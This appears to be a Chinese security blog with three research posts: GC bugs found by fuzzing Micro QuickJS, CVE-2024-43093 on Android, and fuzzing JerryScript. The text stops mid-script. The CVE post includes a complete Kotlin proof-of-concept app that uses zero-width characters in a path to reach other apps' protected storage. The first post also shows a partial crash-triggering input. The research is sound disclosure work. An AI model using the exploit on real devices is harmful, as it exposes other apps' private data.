标签 Realworld 下的文章

0. 起因

2025.12.23 传奇程序员 Bellard(Qemu、ffmpeg、QuickJS、TCC... 原作者)发布了他的新作品 Micro QuickJS(mqjs),这是一个用于嵌入式系统上的 JS 引擎。既然是用纯 C 语言实现的,应该会有一些内存损坏漏洞吧。

1. 准备 fuzzer

组件

我决定用 AFL++ 来运行模糊测试。AFL++ 直接使用的话,构造的是逐字节的随机输入,其中大多数都是无意义的乱码(即使配合 cmplog 等)。对于特定语言解释器来说,我们希望构造的输入能够真正被执行。编译原理告诉我们,从人类可读字符串到机器可执行的字节码或机器码需要经历至少三个阶段:词法分析、语法分析、语义分析。完全随机的输入无疑连词法分析都很难通过,更别说语法分析语义分析了。如果构造的输入根本没法运行,那我们就无法触及有关 VM 和 GC(垃圾回收释放内存)相关的更有价值的漏洞。

西电网信院在大二有一门选修课就是编译原理,最后的大作业是 C 语言标准库手搓自定义绘图语言编译器,十分带劲。不过据说从 24 级开始这门课🈚️了。

我感觉从 LLVM pass 上手会更有实用价值一些。

而如果配合 Grammar-Mutator,我们就可以实现语法级的 fuzzing。我们只需要提供这个语言的语法的生成式,自动编译成自定义 mutator。AFL 运行时就会调用它来将先前的 seed 转变为 AST,再随机选择 AST 中的节点,根据生成式变异为另一个节点或子树,最后再根据 AST 生成代码作为新的 seed。(具体可以看这篇文章

当然,编译时 Address Sanitizer 也必不可少(-fsanitize=address)。我试过再加上 UB Sanitizer,但是随便一运行就爆了,难道到处都是 UB?

问题修复

一开始运行 Grammar-Mutator 有时会报错 _pick_non_term_node returns NULL 然后直接退出。不知道为什么它在极罕见情况下会找不到某个非终结符能够用来变异的生成式。

遇到这种情况就不变异吧,直接把整个 AFL 停了真的好吗,,修改代码如下即可:

diff --git a/src/tree_mutation.c b/src/tree_mutation.c
index 68e91f9..62da2ed 100644
--- a/src/tree_mutation.c
+++ b/src/tree_mutation.c
@@ -39,8 +39,10 @@ tree_t *random_mutation(tree_t *tree) {
   if (unlikely(node == NULL)) {
 
     // By design, _pick_non_term_node should not return NULL
-    perror("_pick_non_term_node returns NULL");
-    exit(EXIT_FAILURE);
+    // perror("_pick_non_term_node returns NULL");
+    // exit(EXIT_FAILURE);
+
+    return mutated_tree;
 
   }
 
@@ -203,9 +205,10 @@ tree_t *splicing_mutation(tree_t *tree) {
   if (unlikely(node == NULL)) {
 
     // By design, _pick_non_term_node should not return NULL
-    perror("_pick_non_term_node returns NULL");
-    exit(EXIT_FAILURE);
+    // perror("_pick_non_term_node returns NULL");
+    // exit(EXIT_FAILURE);
 
+    return mutated_tree;
   }
 
   node_t *parent = node->parent;

执行

编写 fuzzing harness 用于 persistent mode,同时按照 Grammar-Mutator 的官方文档编译好 mutator library,自动生成初始种子。我们在 aflplusplus/aflplusplus docker container 里用以下参数运行 AFL:

while true; do AFL_DISABLE_TRIM=1 AFL_CUSTOM_MUTATOR_LIBRARY=./libgrammarmutator-javascript.so AFL_USE_ASAN=1 afl-fuzz -i seeds/ -o out/ -b 2 -a text -G 1024 -t 200 -S asan -- ./mjs_harness_asan; sleep 1; done

运行过程中我总结了一些经验:

  • 我选择关闭 ptrim,因为对于语法级 fuzzing,trim 反而会丢失复杂的结构,使之后的变异难以发现新的分支。
  • 加上超时是对的,但是不能太低,跑得慢的 seed 反而更有价值(复杂的 GC 行为)。
  • Grammar-Mutator 根据 AST 进行变异像是一个无限深度递归,所以 cycles 几乎不会增长,这是正常的。

2. Fuzzing 结果

大约 11 小时后,第一批 crashes 出现了:

a0decb4d5ac7fed0f095f124b7c2f22e.png

id 000000 内容大概是:

var a = [];
var b = [];
var c = [];
var d = [];
(Infinity**((((a+(((((((((((((((((((((new Float64Array(0,0/0,0,{g: false})))))))))))))))))))))==(~0)))))));
function Float64Array(console, EvalError,Int16Array,Reflect,NaN){
new Float64Array(false,TypeError[[[((((((((((((((((((((((((((((((((((((((((((((((((((((d.concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat((((--b) >>> -0)),(((--b) >>> -0)),(((--b) >>> 
// 暂不完整公开 ...

可以看到其中有明显的无限递归,另外还有大量的 concat,这无疑同时给堆和栈带来了巨大的内存分配压力,也就很可能出现 GC 相关的漏洞。

对此,Address Sanitizer 的评价是:

=================================================================
==1599335==ERROR: AddressSanitizer: negative-size-param: (size=-2112)
    #0 0x55f81ffe8449 in __asan_memmove (/home/rik/Desktop/crashes/mjs_harness_asan+0x17e449) (BuildId: 44bae498641fcf1516b886c154ce5bcf4f3fdee4)
    #1 0x55f8200c1be2 in JS_MakeUniqueString /home/rik/Desktop/fuzzing/mjs-fuzzing/mquickjs/mquickjs.c:2032:5
    #2 0x55f8200aab94 in JS_ToPropertyKey /home/rik/Desktop/fuzzing/mjs-fuzzing/mquickjs/mquickjs.c:4193:16
    #3 0x55f8200aab94 in JS_Call /home/rik/Desktop/fuzzing/mjs-fuzzing/mquickjs/mquickjs.c:6009:28
    #4 0x55f82011a802 in JS_Run /home/rik/Desktop/fuzzing/mjs-fuzzing/mquickjs/mquickjs.c:11799:11
    #5 0x55f82003e19b in LLVMFuzzerTestOneInput /home/rik/Desktop/fuzzing/mjs-fuzzing/mquickjs/fuzz_harness.c:140:15
    #6 0x55f820038c59 in ExecuteFilesOnyByOne (/home/rik/Desktop/crashes/mjs_harness_asan+0x1cec59) (BuildId: 44bae498641fcf1516b886c154ce5bcf4f3fdee4)
    #7 0x55f820038a38 in LLVMFuzzerRunDriver (/home/rik/Desktop/crashes/mjs_harness_asan+0x1cea38) (BuildId: 44bae498641fcf1516b886c154ce5bcf4f3fdee4)
    #8 0x55f8200385c6 in main (/home/rik/Desktop/crashes/mjs_harness_asan+0x1ce5c6) (BuildId: 44bae498641fcf1516b886c154ce5bcf4f3fdee4)
    #9 0x7f24f4027634 in __libc_start_call_main /usr/src/debug/glibc/glibc/csu/../sysdeps/nptl/libc_start_call_main.h:58:16
    #10 0x7f24f40276e8 in __libc_start_main /usr/src/debug/glibc/glibc/csu/../csu/libc-start.c:360:3
    #11 0x55f81feef3e4 in _start (/home/rik/Desktop/crashes/mjs_harness_asan+0x853e4) (BuildId: 44bae498641fcf1516b886c154ce5bcf4f3fdee4)

0x7f24f0c4f8b8 is located 327864 bytes inside of 4194304-byte region [0x7f24f0bff800,0x7f24f0fff800)
allocated by thread T0 here:
    #0 0x55f81ffeb905 in malloc (/home/rik/Desktop/crashes/mjs_harness_asan+0x181905) (BuildId: 44bae498641fcf1516b886c154ce5bcf4f3fdee4)
    #1 0x55f82003cee9 in LLVMFuzzerTestOneInput /home/rik/Desktop/fuzzing/mjs-fuzzing/mquickjs/fuzz_harness.c:112:21
    #2 0x55f820038c59 in ExecuteFilesOnyByOne (/home/rik/Desktop/crashes/mjs_harness_asan+0x1cec59) (BuildId: 44bae498641fcf1516b886c154ce5bcf4f3fdee4)

SUMMARY: AddressSanitizer: negative-size-param (/home/rik/Desktop/crashes/mjs_harness_asan+0x17e449) (BuildId: 44bae498641fcf1516b886c154ce5bcf4f3fdee4) in __asan_memmove
==1599335==

负数 size?

过了一会,又出现了七百多个崩溃,我想是时候开始分析了。

3. 分析 crashes

Micro QuickJS 的 GC 过程如下:

先将整个堆扫描一遍来标记需要释放的对象(JS_MTAG_FREE),

/* 'size' is in bytes and must be multiple of JSW and > 0 */
static void set_free_block(void *ptr, uint32_t size)
{
    JSFreeBlock *p;
    p = (JSFreeBlock *)ptr;
    p->mtag = JS_MTAG_FREE;
    p->gc_mark = 0;
    p->size = (size - sizeof(JSFreeBlock)) / sizeof(JSWord);
}

然后在 JS_GC2 中使用 Jonkers 算法来释放内存(gc_compact_heap)。具体来说,就是把所有不是 JS_MTAG_FREE 标记的对象都向低地址移,填补所有 JS_MTAG_FREE 对象带来的空洞。

    /* pass 2: update the threaded pointers and move the block to its
       final position */
    new_ptr = ctx->heap_base;
    ptr = ctx->heap_base;
    while (ptr < ctx->heap_free) {
        gc_update_threaded_pointers(ctx, ptr, new_ptr);
        size = get_mblock_size(ptr);
        if (js_get_mtag(ptr) != JS_MTAG_FREE) {
            if (new_ptr != ptr) {
                memmove(new_ptr, ptr, size);
            }
            new_ptr += size;
        }
        ptr += size;
    }
    ctx->heap_free = new_ptr;

一个很关键的问题是,这样的 GC 有可能会移动对象的位置,所以 GC 的下一步是修改引用方的指针到移动后的位置。不在 JS VM 栈中的对象指针(例如在裸 C 数组里的 JS 对象指针)就无法被追踪到,它们就会立刻沦为垂悬指针。所以在编写 mqjs 期间需要时刻注意哪些函数可能触发 GC,并将临时变量推入 JS VM 栈中。

这几百个崩溃几乎都是因为没有注意到可能 GC 的函数导致的。例如 2 中提到的崩溃,

static JSValue JS_MakeUniqueString(JSContext *ctx, JSValue val) {
    // ...
    
    arr = JS_VALUE_TO_PTR( ctx->unique_strings);
    val1 = find_atom(ctx, &a, arr, ctx->unique_strings_len, val); 
    if (!JS_IsNull(val1))
        return val1;
    
    JS_PUSH_VALUE(ctx, val);
    is_numeric = js_is_numeric_string(ctx, val);
    JS_POP_VALUE(ctx, val);
    if (is_numeric < 0)
        return JS_EXCEPTION;
    
    /* not found: add it in the table */
    JS_PUSH_VALUE(ctx, val);
    new_tab = js_resize_value_array(ctx, ctx->unique_strings,
                                 ctx->unique_strings_len + 1);
    JS_POP_VALUE(ctx, val);
    if (JS_IsException(new_tab))
        return JS_EXCEPTION;
    ctx->unique_strings = new_tab;
    arr = JS_VALUE_TO_PTR( ctx->unique_strings);
    memmove(&arr->arr[a + 1], &arr->arr[a],
            sizeof(arr->arr[0]) * (ctx->unique_strings_len - a));
    
    // ...
}

可以看到 JS_MakeUniqueString 首先从 ctx->unique_strings 中搜索(find_atom)相同字符串的索引(a)。这是一种常见的优化,在创建任何字符串前都在一个字符串表里检查有没有重复字符串,如果有就直接使用它如果没有再分配新空间并插入表中,避免重复浪费内存。但是由于 ctx->unique_strings_lenfind_atommemmove 之间减小了(被 GC 清理了一部分),所以 ctx->unique_strings_len - a 变成了负数!(a 应该永远小于 ctx->unique_strings_len。)其中 js_is_numeric_stringjs_resize_value_array 都有可能触发 GC(主要是 js_is_numeric_string)。

按照以上思路,我们还能找到其他 GC UAF 漏洞,甚至可利用的漏洞。事实上,我们可以修改 mqjs 源码,使其在每次申请内存前都执行一次 GC,这样能更高效地挖掘出类似的漏洞,无需等待 AFL 随机出有 GC 压力的 seed。(这应该是一个通用的技巧)

4. 利用

...

5. 修复

对于 2 中提到的崩溃,比较简单的修复方案就是在 memmove 前再执行一次 find_atom 定位插入位置。另外 js_is_numeric_string 也不应该需要 O(n) 空间复杂度。

...

QuickJS-NG 也可以通过相同方案找到有意义的漏洞。

简介

CVE‑2024‑43093 是一个 Android 框架组件中的权限提升漏洞,其成因核心是文件路径过滤器在处理包含 Unicode 字符的路径时存在逻辑问题。出人意料的是,至今仍有不少安卓设备没有修复这个漏洞。使用 DuckDetector 可以检测这个漏洞在当前设备上是否修补。

成因

产生问题的代码位于 com/android/externalstorage/ExternalStorageProvider.java 中的 shouldHideDocument 函数。路径检查逻辑首先对文件路径进行规范化,本意是为了能正确匹配过滤规则,防止特殊字符注入。但是这种规范化不能防范所有字符的情况,例如零宽空格。如果在访问路径中插入零宽空格,那么就能绕过这个过滤规则,读写 /sdcard/Android/{data,obb}/<package> 任意目录。

修复

Google 早在 2024 年已尝试修复这个漏洞,将路径过滤规则从简单的正则匹配改为使用 Java File 逐级遍历验证路径是否相同,但仍然无法阻挡这个漏洞。修复 patch diff 如下:

@@ -16,8 +16,6 @@
 
 package com.android.externalstorage;
 
-import static java.util.regex.Pattern.CASE_INSENSITIVE;
-
 import android.annotation.NonNull;
 import android.annotation.Nullable;
 import android.app.usage.StorageStatsManager;
@@ -61,12 +59,15 @@
 import java.io.FileNotFoundException;
 import java.io.IOException;
 import java.io.PrintWriter;
+import java.nio.file.Files;
+import java.nio.file.Paths;
+import java.util.Arrays;
 import java.util.Collections;
 import java.util.List;
 import java.util.Locale;
 import java.util.Objects;
 import java.util.UUID;
-import java.util.regex.Pattern;
+import java.util.stream.Collectors;
 
 /**
  * Presents content of the shared (a.k.a. "external") storage.
@@ -89,12 +90,9 @@
     private static final Uri BASE_URI =
             new Uri.Builder().scheme(ContentResolver.SCHEME_CONTENT).authority(AUTHORITY).build();
 
-    /**
-     * Regex for detecting {@code /Android/data/}, {@code /Android/obb/} and
-     * {@code /Android/sandbox/} along with all their subdirectories and content.
-     */
-    private static final Pattern PATTERN_RESTRICTED_ANDROID_SUBTREES =
-            Pattern.compile("^Android/(?:data|obb|sandbox)(?:/.+)?", CASE_INSENSITIVE);
+    private static final String PRIMARY_EMULATED_STORAGE_PATH = "/storage/emulated/";
+
+    private static final String STORAGE_PATH = "/storage/";
 
     private static final String[] DEFAULT_ROOT_PROJECTION = new String[] {
             Root.COLUMN_ROOT_ID, Root.COLUMN_FLAGS, Root.COLUMN_ICON, Root.COLUMN_TITLE,
@@ -309,11 +307,70 @@
             return false;
         }
 
-        final String path = getPathFromDocId(documentId);
-        return PATTERN_RESTRICTED_ANDROID_SUBTREES.matcher(path).matches();
+        try {
+            final RootInfo root = getRootFromDocId(documentId);
+            final String canonicalPath = getPathFromDocId(documentId);
+            return isRestrictedPath(root.rootId, canonicalPath);
+        } catch (Exception e) {
+            return true;
+        }
     }
 
     /**
+     * Based on the given root id and path, we restrict path access if file is Android/data or
+     * Android/obb or Android/sandbox or one of their subdirectories.
+     *
+     * @param canonicalPath of the file
+     * @return true if path is restricted
+     */
+    private boolean isRestrictedPath(String rootId, String canonicalPath) {
+        if (rootId == null || canonicalPath == null) {
+            return true;
+        }
+
+        final String rootPath;
+        if (rootId.equalsIgnoreCase(ROOT_ID_PRIMARY_EMULATED)) {
+            // Creates "/storage/emulated/<user-id>"
+            rootPath = PRIMARY_EMULATED_STORAGE_PATH + UserHandle.myUserId();
+        } else {
+            // Creates "/storage/<volume-uuid>"
+            rootPath = STORAGE_PATH + rootId;
+        }
+        List<java.nio.file.Path> restrictedPathList = Arrays.asList(
+                Paths.get(rootPath, "Android", "data"),
+                Paths.get(rootPath, "Android", "obb"),
+                Paths.get(rootPath, "Android", "sandbox"));
+        // We need to identify restricted parent paths which actually exist on the device
+        List<java.nio.file.Path> validRestrictedPathsToCheck = restrictedPathList.stream().filter(
+                Files::exists).collect(Collectors.toList());
+
+        boolean isRestricted = false;
+        java.nio.file.Path filePathToCheck = Paths.get(rootPath, canonicalPath);
+        try {
+            while (filePathToCheck != null) {
+                for (java.nio.file.Path restrictedPath : validRestrictedPathsToCheck) {
+                    if (Files.isSameFile(restrictedPath, filePathToCheck)) {
+                        isRestricted = true;
+                        Log.v(TAG, "Restricting access for path: " + filePathToCheck);
+                        break;
+                    }
+                }
+                if (isRestricted) {
+                    break;
+                }
+
+                filePathToCheck = filePathToCheck.getParent();
+            }
+        } catch (Exception e) {
+            Log.w(TAG, "Error in checking file equality check.", e);
+            isRestricted = true;
+        }
+
+        return isRestricted;
+    }
+
+
+    /**
      * Check that the directory is the root of storage or blocked file from tree.
      * <p>
      * Note, that this is different from hidden documents: blocked documents <b>WILL</b> appear

后来 Google 也尝试直接在内核中修改 F2FS 文件系统,但也未能完成修复。(据说还因把 F2FS 弄坏了被 Linus 批评。)真正的修复可以参考 5ec1cff 编写的 Xposed 模块。我用 jadx 逆向分析了一下,这个模块在 Xposed entry 中对 com.android.providers.media.module 注入了一个动态链接库 fusefixer.so

    public void handleLoadPackage(XC_LoadPackage.LoadPackageParam loadPackageParam) {
        if ("com.android.providers.media.module".equals(loadPackageParam.packageName) || "com.google.android.providers.media.module".equals(loadPackageParam.packageName)) {
            System.loadLibrary("fusefixer");
            Log.d("FuseFixer", "injected");
            new Handler(Looper.getMainLooper()).post(new RunnableC0016i(0, this));
        }
    }

在其中又 hook 了 libfuse_jni.so 中的 is_package_owned_pathis_app_accessible_pathis_bpf_backing_path。替换后的函数做了以下操作:

  1. 先判断输入字符串是否包含需要处理的 Unicode 字符;
  2. 如果需要处理,复制出一份可写字符串,扫描该字符串并移除非法字符;
  3. 调用原始函数,修改传入参数为清洗后的字符串。

据说 Google 在 2026 年一月更新中再次修补了这个漏洞,但我的设备更新后依旧可以利用。

复现

由于这是一个披露已久的漏洞,所以应该可以展示复现过程。其实只需要简单编写一个类似文件管理器的程序(我这里选用 Jetpack Compose 框架),让用户输入路径支持 Unicode 转义符或自行插入零宽 Unicode 字符就可以了。我在目前最新的澎湃 OS 3.0.5.0 仍能成功复现这个漏洞。

package cn.pwnerik.pathescape

import android.os.Bundle
import androidx.activity.ComponentActivity
import androidx.activity.compose.setContent
import androidx.activity.enableEdgeToEdge
import androidx.compose.foundation.clickable
import androidx.compose.foundation.layout.*
import androidx.compose.foundation.lazy.LazyColumn
import androidx.compose.foundation.lazy.items
import androidx.compose.material3.*
import androidx.compose.runtime.*
import androidx.compose.ui.Alignment
import androidx.compose.ui.Modifier
import androidx.compose.ui.text.TextRange
import androidx.compose.ui.text.input.TextFieldValue
import androidx.compose.ui.tooling.preview.Preview
import androidx.compose.ui.unit.dp
import cn.pwnerik.pathescape.ui.theme.PathEscapeTheme
import java.io.File

class MainActivity : ComponentActivity() {
    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        enableEdgeToEdge()
        setContent {
            PathEscapeTheme {
                Scaffold(modifier = Modifier.fillMaxSize()) { innerPadding ->
                    FileExplorer(
                        modifier = Modifier.padding(innerPadding)
                    )
                }
            }
        }
    }
}

fun unescapeUnicode(input: String): String {
    val regex = Regex("\\\\u([0-9a-fA-F]{4})")
    return regex.replace(input) {
        try {
            it.groupValues[1].toInt(16).toChar().toString()
        } catch (_: Exception) {
            it.value
        }
    }
}

fun escapeUnicode(input: String): String {
    val sb = StringBuilder()
    for (char in input) {
        if (char.code !in 32..126) {
            sb.append(String.format("\\u%04x", char.code))
        } else {
            sb.append(char)
        }
    }
    return sb.toString()
}

@Composable
fun FileExplorer(modifier: Modifier = Modifier) {
    var pathValue by remember { mutableStateOf(TextFieldValue("")) }
    var files by remember { mutableStateOf(listOf<File>()) }
    var parentDir by remember { mutableStateOf<File?>(null) }
    var errorMessage by remember { mutableStateOf<String?>(null) }
    var hasStarted by remember { mutableStateOf(false) }

    fun listFiles(path: String) {
        val decodedPath = unescapeUnicode(path)
        val directory = File(decodedPath)
        
        // Always update the input box to show the normalized escaped path
        val escapedPath = escapeUnicode(directory.absolutePath)
        pathValue = TextFieldValue(
            text = escapedPath,
            selection = TextRange(escapedPath.length)
        )

        try {
            if (directory.exists() && directory.isDirectory) {
                val list = directory.listFiles()
                files = list?.toList()?.sortedWith(compareBy({ !it.isDirectory }, { it.name.lowercase() })) ?: emptyList()
                parentDir = directory.parentFile
                errorMessage = null
                hasStarted = true
            } else {
                errorMessage = "无效的目录路径: $decodedPath"
                files = emptyList()
                parentDir = null
            }
        } catch (e: Exception) {
            errorMessage = "错误: ${e.message}"
            files = emptyList()
            parentDir = null
        }
    }

    fun insertAtCursor(textToInsert: String) {
        val text = pathValue.text
        val selection = pathValue.selection
        val newText = text.take(selection.start) + textToInsert + text.substring(selection.end)
        val newCursorPosition = selection.start + textToInsert.length
        pathValue = TextFieldValue(
            text = newText,
            selection = TextRange(newCursorPosition)
        )
    }

    Column(
        modifier = modifier
            .fillMaxSize()
            .padding(16.dp)
    ) {
        Row(
            modifier = Modifier.fillMaxWidth(),
            verticalAlignment = Alignment.CenterVertically
        ) {
            TextField(
                value = pathValue,
                onValueChange = { pathValue = it },
                modifier = Modifier.weight(1f),
                label = { Text("目录路径") },
                singleLine = true
            )
            Spacer(modifier = Modifier.width(8.dp))
            Button(onClick = { listFiles(pathValue.text) }) {
                Text("列出")
            }
        }

        Spacer(modifier = Modifier.height(8.dp))

        Row(
            modifier = Modifier.fillMaxWidth(),
            horizontalArrangement = Arrangement.spacedBy(8.dp)
        ) {
            OutlinedButton(onClick = { insertAtCursor("/storage/emulated/0") }) {
                Text("主目录")
            }
            OutlinedButton(onClick = { insertAtCursor("\\u200d") }) {
                Text("零宽空格")
            }
            OutlinedButton(onClick = { pathValue = TextFieldValue("", TextRange.Zero) }) {
                Text("清空")
            }
        }

        Spacer(modifier = Modifier.height(16.dp))

        if (errorMessage != null) {
            Text(
                text = errorMessage!!,
                color = MaterialTheme.colorScheme.error,
                modifier = Modifier.padding(bottom = 8.dp)
            )
        }

        LazyColumn(modifier = Modifier.fillMaxSize()) {
            // Add parent directory link if not at root and after first listing
            if (hasStarted && parentDir != null) {
                item {
                    FileItem(
                        name = "..",
                        isDirectory = true,
                        onClick = { listFiles(parentDir!!.absolutePath) }
                    )
                    HorizontalDivider(modifier = Modifier.padding(vertical = 4.dp), thickness = 0.5.dp)
                }
            }
            
            items(files) { file ->
                FileItem(
                    name = file.name,
                    isDirectory = file.isDirectory,
                    onClick = {
                        if (file.isDirectory) {
                            listFiles(file.absolutePath)
                        }
                    }
                )
                HorizontalDivider(modifier = Modifier.padding(vertical = 4.dp), thickness = 0.5.dp)
            }
        }
    }
}

@Composable
fun FileItem(name: String, isDirectory: Boolean, onClick: () -> Unit) {
    val type = if (isDirectory) "[目录] " else "[文件] "
    Text(
        text = "$type$name",
        modifier = Modifier
            .fillMaxWidth()
            .clickable(onClick = onClick)
            .padding(vertical = 12.dp),
        style = MaterialTheme.typography.bodyLarge
    )
}

@Preview(showBackground = true)
@Composable
fun FileExplorerPreview() {
    PathEscapeTheme {
        FileExplorer()
    }
}

复现截图

开始之前

这段时间本来想入门 Chrome V8,学了一段时间发现 V8 还是太吃操作了……感觉应该先了解下比较简单的 JS 引擎。于是想着先从适合嵌入式设备的轻量 JS 引擎 JerryScript 开始玩起。正好看到 JerryScript 的 Issues 有好多关于漏洞的报告(无人在意说是),那就复现一下 fuzzing 漏洞挖掘吧。

源码与编译

git clone https://github.com/jerryscript-project/jerryscript
cd jerryscript
python tools/build.py

编译 JerryScript 还是相当简单的,要想 fuzz 它,我们可以直接让 AFL 将文件作为参数传入然后等待崩溃。但是这样的 fuzz 是没有意义的,因为没有经过 AFL instruction。我们需要使用 afl-clang-lto 作为编译器。有关 AFL 的用法和原理,前人之述备矣,我就不赘述了。

JerryScript 已经在 tools/build.py 为我们准备好了接入 libfuzzer 的编译选项,而 AFL 支持为 libfuzzer sanitized binary 启用 persistent mode。那么就用现成的就好。

CC=afl-clang-lto python tools/build.py --libfuzzer=ON --compile-flag='-Wno-enum-enum-conversion' --strip=OFF
CC=afl-clang-lto AFL_LLVM_CMPLOG=1 python tools/build.py --libfuzzer=ON --compile-flag='-Wno-enum-enum  
-conversion -fsanitize=address' --strip=OFF

我们需要添加 -Wno-enum-enum-conversion 编译参数来防止高版本 clang 编译不通过。(如果要用高版本 gcc 编译的话,还需要添加 -Wno-unterminated-string-initialization,因为 jerry-core/ecma/builtin-objects/ecma-builtin-helpers-date.c 中的 day_names_pmonth_names_p 没有考虑 C-style 字符串字面量 tailing NULL byte 占用的空间。)

准备初始 corpus

作为实验,我没有考虑太多,选用 test262 作为 JS 样本,去除其中的注释,就直接作为初始 corpus 了。我选用 AFL 作为 fuzzing 引擎。这对于 JS 引擎而言,效果不会好,但本来也只是实验性质的尝试。AFL 在 fuzz 过程中会根据这些文件不断通过各种策略构造新的输入,收集对于每个输入程序执行后的覆盖率,继续构造新的输入。

import os
import shutil
import subprocess

TEST262_REPO = "https://github.com/tc39/test262.git"
CLONE_DIR = "test262"
CORPUS_DIR = "corpus"
NUM_FILES = 100  # Adjust how many files you want

# Directories considered ES5 core tests
ES5_TEST_DIRS = [
    "test/built-ins",
    "test/language",
    "test/statements",
    "test/annexB"
]

def clone_test262():
    if not os.path.exists(CLONE_DIR):
        print("Cloning test262 repo...")
        subprocess.run(["git", "clone", TEST262_REPO], check=True)
    else:
        print("test262 repo already cloned.")

def gather_es5_js_files():
    js_files = []
    for root, _, files in os.walk(CLONE_DIR):
        # Check if the file is inside one of the ES5 directories
        if any(es5_dir in root.replace("\\", "/") for es5_dir in ES5_TEST_DIRS):
            for file in files:
                if file.endswith(".js"):
                    js_files.append(os.path.join(root, file))
    return js_files

def prepare_corpus(js_files):
    os.makedirs(CORPUS_DIR, exist_ok=True)
    selected_files = js_files[:NUM_FILES]
    print(f"Copying {len(selected_files)} files to corpus directory...")
    existing_names = set()

    for path in selected_files:
        filename = os.path.basename(path)
        name, ext = os.path.splitext(filename)

        # Avoid duplicates by renaming with suffix if needed
        original_filename = filename
        suffix = 1
        while filename in existing_names:
            filename = f"{name}_{suffix}{ext}"
            suffix += 1

        existing_names.add(filename)
        shutil.copy(path, os.path.join(CORPUS_DIR, filename))

    print("Corpus preparation complete.")

if __name__ == "__main__":
    clone_test262()
    all_js_files = gather_es5_js_files()
    if len(all_js_files) == 0:
        print("No ES5 JS files found in test262 repo!")
    else:
        prepare_corpus(all_js_files)

fuzzing

afl-fuzz -i input -o output -b 2 -a text -M master -- ./jerry-libfuzzer
AFL_USE_ASAN=1 afl-fuzz -i input -o output -b 4 -a text -S sanitizer -c 0 -l 2AT -P exploit -p exploit -- ./jerry-libfuzzer

很快就发生了 crash。可以看到 AFL 构造的 JS 输入和乱码真的没区别了。也就是说 JerryScript 在语法分析甚至词法分析阶段就可能崩溃,发生段错误。

结果处理

虽然听起来有点离谱,但是挂机一天后 AFL 收集到了 543 个 crashes。但其中大多数都是 null pointer deref。所以我决定简单筛选一下无效的 crashes。使用 Python gdb 模块批量调试 crash inputs,段错误后先提取产生段错误位置的汇编指令,找到解引用 [reg + offset](寄存器间接寻址)处使用的寄存器,然后再让 gdb 查询这个寄存器的值,如果值为很大的数则将这个 input 另存起来。

import gdb
import os
import shlex
import shutil
import re
from pathlib import Path

# ====== Configuration ======
CRASH_DIR = Path("./crashes")
VALID_DIR = Path("./valid")
LOG_DIR = Path("./logs")
MODE = "copy"   # "copy" or "link"
PATTERN = "cafebabe"   # if NOT found in crash bt/output -> save to VALID_DIR
USE_STDIN = False    # If True, run "run < file" to feed the file on stdin
# Note: timeouts are not enforced inside gdb-embedded script; if you need per-run
# timeouts, run gdb under an external timeout wrapper (e.g. GNU timeout) or use
# the external/python+subprocess approach.
# ===========================

CRASH_DIR = CRASH_DIR.resolve()
VALID_DIR = VALID_DIR.resolve()
LOG_DIR = LOG_DIR.resolve()

x86_64_registers = [
    "rax", "rbx", "rcx", "rdx",
    "rsp", "rbp", "rsi", "rdi",
    "r8", "r9", "r10", "r11",
    "r12", "r13", "r14", "r15"
]

for d in (VALID_DIR, LOG_DIR):
    d.mkdir(parents=True, exist_ok=True)

# helper: unique destination path (avoid overwriting)
def unique_dest(dest: Path) -> Path:
    if not dest.exists():
        return dest
    i = 1
    while True:
        candidate = dest.with_name(dest.name + f".{i}")
        if not candidate.exists():
            return candidate
        i += 1

def install_file(src: Path) -> Path:
    dest = VALID_DIR / src.name
    dest = unique_dest(dest)
    if MODE == "link":
        # try symlink to absolute path
        try:
            os.symlink(str(src.resolve()), str(dest))
        except OSError:
            shutil.copy2(src, dest)
    else:
        shutil.copy2(src, dest)
    return dest

CRASH_PATTERNS = [
    r"Program received signal",
    r"SIGSEGV",
    r"SIGABRT",
    r"Segmentation fault",
    r"SIGILL",
    r"SIGFPE",
    r"^#0",            # backtrace frame 0
    r"AddressSanitizer",
    r"ASAN:",
    r"terminate called",
]

_crash_re = re.compile("|".join("(?:" + p + ")" for p in CRASH_PATTERNS), flags=re.I | re.M)

def detect_crash(text: str) -> bool:
    return bool(_crash_re.search(text))

# Turn off pagination so gdb.execute(..., to_string=True) returns full text
try:
    gdb.execute("set pagination off")
except Exception:
    pass

# The program to run is the one passed with --args ./jerry when launching gdb.
# gdb already knows the executable from --args; we will just set program args each run.
files = sorted([p for p in CRASH_DIR.iterdir() if p.is_file()])

summary = {"processed": 0, "crashes": 0, "saved": 0, "no_crash": 0}

for infile in files:
    summary["processed"] += 1
    name = infile.name
    logfile = LOG_DIR / (name + ".log")
    print("---- Processing:", name)

    # Set args or use stdin redirection
    if USE_STDIN:
        # clear any args (not necessary, but explicit)
        try:
            gdb.execute("set args")
        except Exception:
            pass
        run_cmd = "run < " + shlex.quote(str(infile))
    else:
        # set argv for the debugged program to the filename
        # (if your program accepts multiple args, adjust as needed)
        try:
            gdb.execute("set args " + shlex.quote(str(infile)))
        except Exception:
            pass
        run_cmd = "run"

    # Execute run and capture textual output
    try:
        out_run = gdb.execute(run_cmd, to_string=True)
    except gdb.error as e:
        # gdb.error may be thrown if the program exited in a way gdb treats specially;
        # capture the string representation and continue to collect bt below.
        out_run = str(e)

    # After run, collect a backtrace (best-effort)
    try:
        out_bt = gdb.execute("bt full", to_string=True)
    except Exception:
        try:
            out_bt = gdb.execute("bt", to_string=True)
        except Exception:
            out_bt = ""

    combined = out_run + "\n" + out_bt

    # Save log
    with logfile.open("w", encoding="utf-8", errors="replace") as f:
        f.write("COMMAND: " + run_cmd + "\n\n")
        f.write("=== RUN OUTPUT ===\n")
        f.write(out_run + "\n\n")
        f.write("=== BACKTRACE ===\n")
        f.write(out_bt + "\n")

    # Detect crash
    if detect_crash(combined):
        summary["crashes"] += 1
        crash_line = gdb.execute('x/i $rip', to_string=True)
        valid = False
        if "[" not in crash_line:
            continue
        for reg in x86_64_registers:
            if reg in crash_line[crash_line.index("["):crash_line.index("]")] and int(gdb.execute(f"p ${reg}", to_string=True).split(' ')[-1], 16) > 8:
                valid = True
        if not valid:
            continue
        print("  -> Valid crash detected. Log:", logfile)
        if PATTERN.lower() in combined.lower():
